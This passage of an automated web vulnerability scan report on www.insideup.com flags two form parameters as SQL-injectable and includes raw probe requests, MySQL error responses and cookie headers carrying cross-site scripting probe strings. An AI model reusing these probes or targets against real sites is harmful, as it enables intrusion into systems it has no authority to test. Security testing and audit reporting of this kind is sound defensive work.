OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:53:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3ik0k58735c95dajlb0e0abd14; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.213. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:53:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n0ljo87bbqus4k3m90ne6rm596; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kgrcaau0j325blrqknh8l4s6b7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.214. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_387 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_387 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_387 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only'&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8hg5h3foklbltt97biheu5b1f2; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000&attributeId_389=1905__1&attributeId_390=1912__Less than 2 months&attributeId' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only''&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
